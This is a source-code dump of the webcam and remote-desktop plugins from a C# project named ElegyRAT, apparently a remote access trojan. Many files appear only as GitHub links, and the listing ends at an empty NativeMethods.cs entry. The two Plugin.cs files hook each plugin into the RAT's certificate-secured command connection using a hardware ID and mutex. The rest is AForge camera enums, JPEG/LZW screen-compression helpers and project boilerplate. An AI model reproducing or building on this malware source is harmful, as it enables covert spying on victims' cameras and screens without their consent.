/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RemoteCamera", "RemoteCamera\RemoteCamera.csproj", "{619B7612-DFEA-442A-A927-D997F99C497B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {619B7612-DFEA-442A-A927-D997F99C497B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {619B7612-DFEA-442A-A927-D997F99C497B}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {619B7612-DFEA-442A-A927-D997F99C497B}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {619B7612-DFEA-442A-A927-D997F99C497B}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {36226AA4-CC2B-4260-B49C-AE8C3D60BB56}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/CameraControlProperty.cs:
--------------------------------------------------------------------------------
1 | // AForge Direct Show Library
2 | // AForge.NET framework
3 | // http://www.aforgenet.com/framework/
4 | //
5 | // Copyright © AForge.NET, 2009-2013
6 | // contacts@aforgenet.com
7 | //
8 |
9 | namespace AForge.Video.DirectShow
10 | {
11 | using System;
12 |
13 | ///
14 | /// The enumeration specifies a setting on a camera.
15 | ///
16 | public enum CameraControlProperty
17 | {
18 | ///
19 | /// Pan control.
20 | ///
21 | Pan = 0,
22 | ///
23 | /// Tilt control.
24 | ///
25 | Tilt,
26 | ///
27 | /// Roll control.
28 | ///
29 | Roll,
30 | ///
31 | /// Zoom control.
32 | ///
33 | Zoom,
34 | ///
35 | /// Exposure control.
36 | ///
37 | Exposure,
38 | ///
39 | /// Iris control.
40 | ///
41 | Iris,
42 | ///
43 | /// Focus control.
44 | ///
45 | Focus
46 | }
47 |
48 | ///
49 | /// The enumeration defines whether a camera setting is controlled manually or automatically.
50 | ///
51 | [Flags]
52 | public enum CameraControlFlags
53 | {
54 | ///
55 | /// No control flag.
56 | ///
57 | None = 0x0,
58 | ///
59 | /// Auto control Flag.
60 | ///
61 | Auto = 0x0001,
62 | ///
63 | /// Manual control Flag.
64 | ///
65 | Manual = 0x0002
66 | }
67 | }
68 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/FilterInfo.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/FilterInfo.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/FilterInfoCollection.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/FilterInfoCollection.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMStreamConfig.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMStreamConfig.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IBaseFilter.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IBaseFilter.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ICaptureGraphBuilder2.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ICaptureGraphBuilder2.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ICreateDevEnum.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ICreateDevEnum.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IEnumFilters.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IEnumFilters.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IEnumPins.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IEnumPins.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IFilterGraph.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IFilterGraph.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IFilterGraph2.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IFilterGraph2.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IGraphBuilder.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IGraphBuilder.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IMediaControl.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IMediaControl.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IPin.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IPin.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IPropertyBag.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IPropertyBag.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IReferenceClock.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IReferenceClock.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISampleGrabber.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISampleGrabber.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISampleGrabberCB.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISampleGrabberCB.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISpecifyPropertyPages.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISpecifyPropertyPages.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Structures.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Structures.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Uuids.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Uuids.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Win32.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Win32.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Uuids.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Uuids.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/VideoCapabilities.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/VideoCapabilities.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/VideoInput.cs:
--------------------------------------------------------------------------------
1 | // AForge Direct Show Library
2 | // AForge.NET framework
3 | // http://www.aforgenet.com/framework/
4 | //
5 | // Copyright © AForge.NET, 2009-2012
6 | // contacts@aforgenet.com
7 | //
8 |
9 | namespace AForge.Video.DirectShow
10 | {
11 | using System;
12 |
13 | ///
14 | /// Video input of a capture board.
15 | ///
16 | ///
17 | /// The class is used to describe video input of devices like video capture boards,
18 | /// which usually provide several inputs.
19 | ///
20 | ///
21 | public class VideoInput
22 | {
23 | ///
24 | /// Index of the video input.
25 | ///
26 | public readonly int Index;
27 |
28 | ///
29 | /// Type of the video input.
30 | ///
31 | public readonly PhysicalConnectorType Type;
32 |
33 | internal VideoInput( int index, PhysicalConnectorType type )
34 | {
35 | Index = index;
36 | Type = type;
37 | }
38 |
39 | ///
40 | /// Default video input. Used to specify that it should not be changed.
41 | ///
42 | public static VideoInput Default
43 | {
44 | get { return new VideoInput( -1, PhysicalConnectorType.Default ); }
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video/IVideoSource.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video/IVideoSource.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video/VideoEvents.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/AForge/Video/VideoEvents.cs
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.Linq;
5 | using System.Net.Security;
6 | using System.Net.Sockets;
7 | using System.Security.Cryptography.X509Certificates;
8 | using System.Text;
9 | using System.Threading;
10 |
11 | namespace Plugin
12 | {
13 | public class Plugin
14 | {
15 | public static Socket Socket;
16 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
17 | {
18 | Debug.WriteLine("Plugin Invoked");
19 | Socket = socket;
20 | Connection.ServerCertificate = certificate;
21 | Connection.Hwid = hwid;
22 | new Thread(() =>
23 | {
24 | Connection.InitializeClient();
25 | }).Start();
26 |
27 | while (Connection.IsConnected)
28 | {
29 | Thread.Sleep(1000);
30 | }
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("619b7612-dfea-442a-a927-d997f99c497b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteCamera/RemoteCamera/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29123.88
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RemoteDesktop", "RemoteDesktop\RemoteDesktop.csproj", "{9042B543-13D1-42B3-A5B6-5CC9AD55E150}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {9042B543-13D1-42B3-A5B6-5CC9AD55E150}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {7CFE40D5-9697-4707-BAFB-175B85AB7070}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/ILMergeOrder.txt:
--------------------------------------------------------------------------------
1 | # this file contains the partial list of the merged assemblies in the merge order
2 | # you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
3 | # and finetune merge order to your satisfaction
4 |
5 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Diagnostics;
4 | using System.Linq;
5 | using System.Net.Security;
6 | using System.Net.Sockets;
7 | using System.Security.Cryptography.X509Certificates;
8 | using System.Text;
9 | using System.Threading;
10 |
11 | namespace Plugin
12 | {
13 | public class Plugin
14 | {
15 | public static Socket Socket;
16 | public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
17 | {
18 | Debug.WriteLine("Plugin Invoked");
19 | Socket = socket;
20 | Connection.ServerCertificate = certificate;
21 | Connection.Hwid = hwid;
22 | new Thread(() =>
23 | {
24 | Connection.InitializeClient();
25 | }).Start();
26 |
27 | while (Connection.IsConnected)
28 | {
29 | Thread.Sleep(1000);
30 | }
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | //[assembly: Guid("9042b543-13d1-42b3-a5b6-5cc9ad55e150")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/Enums.cs:
--------------------------------------------------------------------------------
1 | namespace Plugin.StreamLibrary
2 | {
3 | public enum CodecOption
4 | {
5 | ///
6 | /// The Previous and next image size must be equal
7 | ///
8 | RequireSameSize,
9 | ///
10 | /// If the codec is having a stream buffer
11 | ///
12 | HasBuffers,
13 | ///
14 | /// The image will be disposed by the codec and shall not be disposed by the user
15 | ///
16 | AutoDispose,
17 | /// No codec options were used
18 | None
19 | };
20 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/IUnsafeCodec.cs:
--------------------------------------------------------------------------------
1 | using Plugin.StreamLibrary.src;
2 | using System;
3 | using System.Drawing;
4 | using System.Drawing.Imaging;
5 | using System.IO;
6 |
7 | namespace Plugin.StreamLibrary
8 | {
9 | public abstract class IUnsafeCodec
10 | {
11 | protected JpgCompression jpgCompression;
12 | protected LzwCompression lzwCompression;
13 | public abstract ulong CachedSize { get; internal set; }
14 | protected object ImageProcessLock { get; private set; }
15 |
16 | private int _imageQuality;
17 | public int ImageQuality
18 | {
19 | get { return _imageQuality; }
20 | set
21 | {
22 | _imageQuality = value;
23 | jpgCompression = new JpgCompression(value);
24 | lzwCompression = new LzwCompression(value);
25 | }
26 | }
27 |
28 |
29 | public abstract event IVideoCodec.VideoDebugScanningDelegate onCodeDebugScan;
30 | public abstract event IVideoCodec.VideoDebugScanningDelegate onDecodeDebugScan;
31 |
32 | public IUnsafeCodec(int ImageQuality = 100)
33 | {
34 | this.ImageQuality = ImageQuality;
35 | this.ImageProcessLock = new object();
36 | }
37 |
38 | public abstract int BufferCount { get; }
39 | public abstract CodecOption CodecOptions { get; }
40 | public abstract unsafe void CodeImage(IntPtr Scan0, Rectangle ScanArea, Size ImageSize, PixelFormat Format, Stream outStream);
41 | public abstract unsafe Bitmap DecodeData(Stream inStream);
42 | public abstract unsafe Bitmap DecodeData(IntPtr CodecBuffer, uint Length);
43 | }
44 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/IVideoCodec.cs:
--------------------------------------------------------------------------------
1 | using Plugin.StreamLibrary.src;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Drawing;
5 | using System.IO;
6 | using System.Text;
7 |
8 | namespace Plugin.StreamLibrary
9 | {
10 | public abstract class IVideoCodec
11 | {
12 | public delegate void VideoCodeProgress(Stream stream, Rectangle[] MotionChanges);
13 | public delegate void VideoDecodeProgress(Bitmap bitmap);
14 | public delegate void VideoDebugScanningDelegate(Rectangle ScanArea);
15 |
16 | public abstract event VideoCodeProgress onVideoStreamCoding;
17 | public abstract event VideoDecodeProgress onVideoStreamDecoding;
18 | public abstract event VideoDebugScanningDelegate onCodeDebugScan;
19 | public abstract event VideoDebugScanningDelegate onDecodeDebugScan;
20 | protected JpgCompression jpgCompression;
21 | public abstract ulong CachedSize { get; internal set; }
22 | public int ImageQuality { get; set; }
23 |
24 | public IVideoCodec(int ImageQuality = 100)
25 | {
26 | this.jpgCompression = new JpgCompression(ImageQuality);
27 | this.ImageQuality = ImageQuality;
28 | }
29 |
30 | public abstract int BufferCount { get; }
31 | public abstract CodecOption CodecOptions { get; }
32 | public abstract void CodeImage(Bitmap bitmap, Stream outStream);
33 | public abstract Bitmap DecodeData(Stream inStream);
34 | }
35 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/JpgCompression.cs:
--------------------------------------------------------------------------------
1 | using System.Drawing;
2 | using System.Drawing.Imaging;
3 | using System.IO;
4 |
5 | namespace Plugin.StreamLibrary.src
6 | {
7 | public class JpgCompression
8 | {
9 | private EncoderParameter parameter;
10 | private ImageCodecInfo encoderInfo;
11 | private EncoderParameters encoderParams;
12 |
13 | public JpgCompression(int Quality)
14 | {
15 | this.parameter = new EncoderParameter(System.Drawing.Imaging.Encoder.Quality, (long)Quality);
16 | this.encoderInfo = GetEncoderInfo("image/jpeg");
17 | this.encoderParams = new EncoderParameters(2);
18 | this.encoderParams.Param[0] = parameter;
19 | this.encoderParams.Param[1] = new EncoderParameter(System.Drawing.Imaging.Encoder.Compression, (long)2);
20 | }
21 |
22 | public byte[] Compress(Bitmap bmp)
23 | {
24 | using (MemoryStream stream = new MemoryStream())
25 | {
26 | bmp.Save(stream, encoderInfo, encoderParams);
27 | return stream.ToArray();
28 | }
29 | }
30 | public void Compress(Bitmap bmp, ref Stream TargetStream)
31 | {
32 | bmp.Save(TargetStream, encoderInfo, encoderParams);
33 | }
34 |
35 | private ImageCodecInfo GetEncoderInfo(string mimeType)
36 | {
37 | ImageCodecInfo[] imageEncoders = ImageCodecInfo.GetImageEncoders();
38 | int num2 = imageEncoders.Length - 1;
39 | for (int i = 0; i <= num2; i++)
40 | {
41 | if (imageEncoders[i].MimeType == mimeType)
42 | {
43 | return imageEncoders[i];
44 | }
45 | }
46 | return null;
47 | }
48 | }
49 | }
50 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/LzwCompression.cs:
--------------------------------------------------------------------------------
1 | using System.Drawing;
2 | using System.Drawing.Imaging;
3 | using System.IO;
4 |
5 | namespace Plugin.StreamLibrary.src
6 | {
7 | public class LzwCompression
8 | {
9 | private EncoderParameter parameter;
10 | private ImageCodecInfo encoderInfo;
11 | private EncoderParameters encoderParams;
12 |
13 | public LzwCompression(int Quality)
14 | {
15 | this.parameter = new EncoderParameter(System.Drawing.Imaging.Encoder.Quality, (long)Quality);
16 | this.encoderInfo = GetEncoderInfo("image/jpeg");
17 | this.encoderParams = new EncoderParameters(2);
18 | this.encoderParams.Param[0] = parameter;
19 | this.encoderParams.Param[1] = new EncoderParameter(System.Drawing.Imaging.Encoder.Compression, (long)EncoderValue.CompressionLZW);
20 | }
21 |
22 | public byte[] Compress(Bitmap bmp, byte[] AdditionInfo = null)
23 | {
24 | using (MemoryStream stream = new MemoryStream())
25 | {
26 | if (AdditionInfo != null)
27 | stream.Write(AdditionInfo, 0, AdditionInfo.Length);
28 | bmp.Save(stream, encoderInfo, encoderParams);
29 | return stream.ToArray();
30 | }
31 | }
32 | public void Compress(Bitmap bmp, Stream stream, byte[] AdditionInfo = null)
33 | {
34 | if (AdditionInfo != null)
35 | stream.Write(AdditionInfo, 0, AdditionInfo.Length);
36 | bmp.Save(stream, encoderInfo, encoderParams);
37 | }
38 |
39 | private ImageCodecInfo GetEncoderInfo(string mimeType)
40 | {
41 | ImageCodecInfo[] imageEncoders = ImageCodecInfo.GetImageEncoders();
42 | for (int i = 0; i < imageEncoders.Length; i++)
43 | {
44 | if (imageEncoders[i].MimeType == mimeType)
45 | {
46 | return imageEncoders[i];
47 | }
48 | }
49 | return null;
50 | }
51 | }
52 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/src/NativeMethods.cs:
